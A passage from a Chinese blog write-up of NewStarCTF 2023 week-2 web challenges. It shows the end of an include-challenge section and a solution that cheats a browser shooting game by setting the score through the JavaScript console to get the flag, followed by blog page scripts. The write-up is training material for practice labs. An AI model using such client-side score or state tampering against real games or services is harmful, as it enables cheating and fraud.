<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010200417.png" alt="" /></p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010200810.png" alt="" /></p>
<p>但是为什么把a变成%61就可以在include中执行？这个我确实不太了解，等题解出了我再看看</p>

        <h2 id="六-游戏高手"   >
          <a href="#六-游戏高手" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#六-游戏高手"></a> 六、游戏高手</h2>
      
<p>这题顾名思义就是打游戏doge，进入环境发现就是个打飞机游戏，并且提示到10万分就会给我flag<img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201026.png" alt="" /></p>
<p>没什么线索就先抓包一下看看，发现打开文件的过程中打开了一个js文件，并且里面是游戏的实现代码</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201124.png" alt="" /></p>
<p>拜读一下代码，发现还是没什么线索，这时候没办法，直接Google</p>
<p>关键词： ctf web js游戏，发现了能用控制台控制游戏，这就有意思了，如图</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201246.png" alt="" /></p>
<p>哪怕我并没有死亡，但是通过读完源代码，了解了一些重要函数之后，输入gameover函数之后就会立即结束游戏，这就说明我可以通过控制台来控制我的分数，那我就直接让score=10万分，发现可以！然后直接gameover，就会出现flag</p>
<img title="" src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201456.png" alt="" width="647">
<p>加上10万分（开挂了doge）然后就直接结束游戏，显示flag</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201610.png" alt="" /></p>

        <h2 id="七-总结"   >
          <a href="#七-总结" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#七-总结"></a> 七、总结</h2>
      
<p>以上就是这次比赛week2的全部web题了，很兴奋竟然全做出来了。具体知识点我每道题都写了。</p>
<center>**本文完**。</center>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://thenights1.github.io">nevgivup</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://thenights1.github.io/2023/10/09/newstarweek2/">https://thenights1.github.io/2023/10/09/newstarweek2/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/ctf%E5%9B%9E%E9%A1%BE/">ctf回顾</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87/">文件上传绕过</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/sql%E6%B3%A8%E5%85%A5/">sql注入</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/js%E6%8E%A7%E5%88%B6%E5%8F%B0/">js控制台</a></span><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://thenights1.github.io/tags/rce/">rce</a></span></div><nav class="post-paginator paginator"><div class="paginator-next"><a class="paginator-next__link" href="/2023/10/05/newstarctf/"><span class="paginator-prev__text">NewStarCTF 2023 week1-web题wp</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div><div class="comments" id="comments"><div id="valine-container"></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-rce"><span class="toc-number">1.</span> <span class="toc-text">
           一、R!!C!!E!!</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%E6%97%A0%E5%8F%82%E6%95%B0rce"><span class="toc-number">1.1.</span> <span class="toc-text">
           1.无参数rce</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%E6%9E%84%E9%80%A0payload"><span class="toc-number">1.2.</span> <span class="toc-text">
           2.构造payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-upload-again"><span class="toc-number">2.</span> <span class="toc-text">
           二、Upload again!</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-unserialize"><span class="toc-number">3.</span> <span class="toc-text">
           三、Unserialize？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B-ez_sql"><span class="toc-number">4.</span> <span class="toc-text">
           四、ez_sql</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94-include-0-0"><span class="toc-number">5.</span> <span class="toc-text">
           五、include 0。0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%AD-%E6%B8%B8%E6%88%8F%E9%AB%98%E6%89%8B"><span class="toc-number">6.</span> <span class="toc-text">
           六、游戏高手</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%83-%E6%80%BB%E7%BB%93"><span class="toc-number">7.</span> <span class="toc-text">
           七、总结</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="https://upload-bbs.mihoyo.com/upload/2021/10/26/74359262/6c25b31a89526ae231affd2cd01b0199_5510541678105571893.jpg?x-oss-process=image/auto-orient,0/interlace,1/format,jpg" alt="avatar"></div><p class="sidebar-ov-author__text">一个人，要走过多远的距离，才能在时光的尽头，寻回最初的自己。</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/thenights1" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://cameudis.github.io/" target="_blank" rel="noopener" data-popover="social.友链" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-gratipay"></i></span></a><a class="sidebar-ov-social-item" href="My WeChat ID is gwb12581" target="_blank" rel="noopener" data-popover="微信" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weixin"></i></span></a><a class="sidebar-ov-social-item" href="My QQ number is 2785895987" target="_blank" rel="noopener" data-popover="QQ" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-qq"></i></span></a></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">15</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">7</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">10</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2023</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>nevgivup</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.8.0</span></div><div class="busuanzi"></div><div>执拗的花朵永远不会因暴雨而褪去颜色，你的决心也一定能在绝境中绽放真我。</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><div class="search-mask"></div><div class="search-popup"><span class="search-close"></span><div class="search-input"><input placeholder="搜索文章（支持多关键词，请用空格分隔）"></div><div class="search-results"></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/ribbon.js@latest/dist/ribbon.min.js" size="120" alpha="0.6" zIndex="-1"></script><script>function initSearch() {
  var isXML = true;
  var search_path = 'search.json';

  if (!search_path) {
    search_path = 'search.xml';
  } else if (/json$/i.test(search_path)) {
    isXML = false;
  }

  var path = '/' + search_path;
  $.ajax({
    url: path,
    dataType: isXML ? 'xml' : 'json',
    async: true,
    success: function (res) {
      var datas = isXML ? $('entry', res).map(function () {
        // 将 XML 转为 JSON
        return {
          title: $('title', this).text(),
          content: $('content', this).text(),
          url: $('url', this).text()
        };
      }).get() : res;
      var $input = $('.search-input input');
      var $result = $('.search-results');
      // 搜索对象（标题、内容）的权重，影响显示顺序
      var WEIGHT = { title: 100, content: 1 };
      var searchPost = function () {
        var searchText = $input.val().toLowerCase().trim();
        // 根据空白字符分隔关键字
        var keywords = searchText.split(/[\s]+/);
        // 搜索结果
        var matchPosts = [];

        // 有多个关键字时，将原文字整个保存下来
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        // 防止未输入字符时搜索
        if (searchText.length > 0) {
          datas.forEach(function (data) {
            var isMatch  = false;
            // 没有标题的文章使用预设的 i18n 变量代替
            var title = (data.title && data.title.trim()) || '[ 文章无标题 ]';
            var titleLower = title && title.toLowerCase();
            // 删除 HTML 标签 和 所有空白字符
            var content = data.content && data.content.replace(/<[^>]+>/g, '');
            var contentLower = content && content.toLowerCase();
            // 删除重复的 /
            var postURL = data.url && decodeURI(data.url).replace(/\/{2,}/g, '/');
            // 标题中匹配到的关键词
            var titleHitSlice = [];
            // 内容中匹配到的关键词
            var contentHitSlice = [];

            keywords.forEach(function (keyword) {
              /**
              * 获取匹配的关键词的索引
              * @param {String} keyword 要匹配的关键字
              * @param {String} text 原文字
              * @param {Boolean} caseSensitive 是否区分大小写
              * @param {Number} weight 匹配对象的权重。权重大的优先显示
              * @return {Array}
              */
              function getIndexByword (word, text, caseSensitive, weight) {
                if (!word || !text) {
                  return [];
                };

                var startIndex = 0; // 每次匹配的开始索引
                var index = -1;     // 匹配到的索引值
                var result = [];    // 匹配结果

                if (!caseSensitive) {
                  word = word.toLowerCase();
                  text = text.toLowerCase();
                }

                while((index = text.indexOf(word, startIndex)) !== -1) {
                  var hasMatch = false;
                  // 索引位置相同的关键词，保留长度较长的
                  titleHitSlice.forEach(function (hit) {
                    if (hit.index === index && hit.word.length < word.length) {
                      hit.word = word;
                      hasMatch = true;
                    }
                  });
                  startIndex = index + word.length;
                  !hasMatch && result.push({ index: index, word: word, weight: weight });
                }
                return result;
              }
              titleHitSlice = titleHitSlice.concat(getIndexByword(keyword, titleLower, false, WEIGHT.title));
              contentHitSlice = contentHitSlice.concat(getIndexByword(keyword, contentLower, false, WEIGHT.content));
            });

            var hitTitle = titleHitSlice.length;
            var hitContent = contentHitSlice.length;

            if (hitTitle > 0 || hitContent > 0) {
              isMatch = true;
            }
            if (isMatch) {
              ;[titleHitSlice, contentHitSlice].forEach(function (hit) {
                // 按照匹配文字的索引的递增顺序排序
                hit.sort(function (left, right) {
                  return left.index - right.index;
                });
              });
              /**
              * 给文本中匹配到的关键词添加标记，从而进行高亮显示
              * @param {String} text 原文本
              * @param {Array} hitSlice 匹配项的索引信息
              * @param {Number} start 开始索引
              * @param {Number} end 结束索引
              * @return {String}
              */
              function highlightKeyword (text, hitSlice, start, end) {
                if (!text || !hitSlice || !hitSlice.length) {
                  return;
                }

                var result = '';
                var startIndex = start;
                var endIndex = end;
                hitSlice.forEach(function (hit) {
                  if (hit.index < startIndex) {
                    return;
                  }

                  var hitWordEnd = hit.index + hit.word.length;
                  result += text.slice(startIndex, hit.index);
                  result += '<b>' + text.slice(hit.index, hitWordEnd) + '</b>';
                  startIndex = hitWordEnd;
                });
                result += text.slice(startIndex, endIndex);
                return result;
              }

              var postData = {};
              // 文章总的搜索权重
              var postWeight = titleHitSlice.length * WEIGHT.title + contentHitSlice.length * WEIGHT.content;
              // 标记匹配关键词后的标题
              var postTitle = highlightKeyword(title, titleHitSlice, 0, title.length) || title;
              // 标记匹配关键词后的内容
              var postContent;
              // 显示内容的长度
              var SHOW_WORD_LENGTH = 200;
              // 命中关键词前的字符显示长度
              var SHOW_WORD_FRONT_LENGTH = 20;
              var SHOW_WORD_END_LENGTH = SHOW_WORD_LENGTH - SHOW_WORD_FRONT_LENGTH;

              // 截取匹配的第一个字符，前后共 200 个字符来显示
              if (contentHitSlice.length > 0) {
                var firstIndex = contentHitSlice[0].index;
                var start = firstIndex > SHOW_WORD_FRONT_LENGTH ? firstIndex - SHOW_WORD_FRONT_LENGTH : 0;
                var end = firstIndex + SHOW_WORD_END_LENGTH;
                postContent = highlightKeyword(content, contentHitSlice, start, end);
              } else { // 未匹配到内容，直接截取前 200 个字符来显示
                postContent = content.slice(0, SHOW_WORD_LENGTH);
              }
              postData.title = postTitle;
              postData.content = postContent;
              postData.url = postURL;
              postData.weight = postWeight;
              matchPosts.push(postData);
            }
          });
        }

        var resultInnerHtml = '';
        if (matchPosts.length) {
          // 按权重递增的顺序排序，使权重大的优先显示
          matchPosts.sort(function (left, right) {
            return right.weight - left.weight;
          });
          resultInnerHtml += '<ul>';
          matchPosts.forEach(function (post) {
            resultInnerHtml += '<li><a class="search-results-title" href="' + post.url + '">';
            resultInnerHtml += post.title;
            resultInnerHtml += '</a><div class="search-results-content">';
            resultInnerHtml += post.content;
            resultInnerHtml += '</div></li>';
          });
          resultInnerHtml += '</ul>';
        } else {
          resultInnerHtml += '<div class="search-results-none"><i class="far fa-meh"></i></div>';
        }
        $result.html(resultInnerHtml);
      };
      $input.on('input', searchPost);
      $input.on('keyup', function (e) {
        if (e.keyCode === Stun.utils.codeToKeyCode('Enter')) {
          searchPost();
        }
      });
    }
  });
}

function closeSearch () {
  $('body').css({ overflow: 'auto' });
  $('.search-popup').css({ display: 'none' });
  $('.search-mask').css({ display: 'none' });
}

window.addEventListener('DOMContentLoaded', function () {
  Stun.utils.pjaxReloadLocalSearch = function () {
    $('.header-nav-search').on('click', function (e) {
      e.stopPropagation();
      $('body').css('overflow', 'hidden');
      $('.search-popup')
        .velocity('stop')
        .velocity('transition.expandIn', {
          duration: 300,
          complete: function () {
            $('.search-popup input').focus();
          }
        });
      $('.search-mask')
        .velocity('stop')
        .velocity('transition.fadeIn', {
          duration: 300
        });

      initSearch();
    });
    $('.search-mask, .search-close').on('click', function () {
      closeSearch();
    });
    $(document).on('keydown', function (e) {
      // Escape <=> 27
      if (e.keyCode === Stun.utils.codeToKeyCode('Escape')) {
        closeSearch();
      }
    });
  };

  Stun.utils.pjaxReloadLocalSearch();
}, false);

function safeOpenUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

function extSearch(engine) {
  var engines = {
    google: 'https://www.google.com/search?q=',
    bing: 'https://cn.bing.com/search?q=',
    baidu: 'https://www.baidu.com/s?ie=UTF-8&wd=',
  };
  var host = window.location.host;
  var query = $('.search-input input').val().toLowerCase().trim();
  var uri = engines[engine] + query + ' site:' + host;

  if (query) {
    safeOpenUrl(uri);
  } else {
    Stun.utils.popAlert('warning', '请输入字符');
  }
}

var assistSearchList = window.CONFIG.assistSearch;

if (Array.isArray(assistSearchList)) {
  assistSearchList.forEach(function (name) {
    document.querySelector('.search-btns-item--' + name).addEventListener('click', function () {
      extSearch(name);
    }, false);
  });
}</script><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script src="https://cdn.jsdelivr.net/npm/leancloud-storage@latest/dist/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script><script>function loadValine () {
  var GUEST_INFO = ['nick', 'mail', 'link'];
  var guest_info = 'nick,mail,link';

  guest_info = guest_info.split(',').filter(function(item) {
    return GUEST_INFO.indexOf(item) > -1;
  });
  new Valine({
    el: '#valine-container',
    appId: 'FRYdoyUkUkHMwPMiF2Ug3vMi-gzGzoHsz',
    appKey: 'iRvJDapkfqlLvjbDW06gVYX7',
    notify: true,
    verify: true,
    placeholder: '唉，时间真是个讨厌的东西，你不觉得吗？如果不是时间紧迫，我还想留下更多值得纪念的话语。',
    avatar: 'mp',
    meta: guest_info,
    pageSize: '10' || 10,
    visitor: true,
    recordIP: true,
    lang: 'zh-cn' || 'zh-cn',
    path: window.location.pathname
  });
}

if (false) {
  loadValine();
} else {
  window.addEventListener('DOMContentLoaded', loadValine, false);
}</script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script><script type="application/json" src="/search.json"></script></body></html>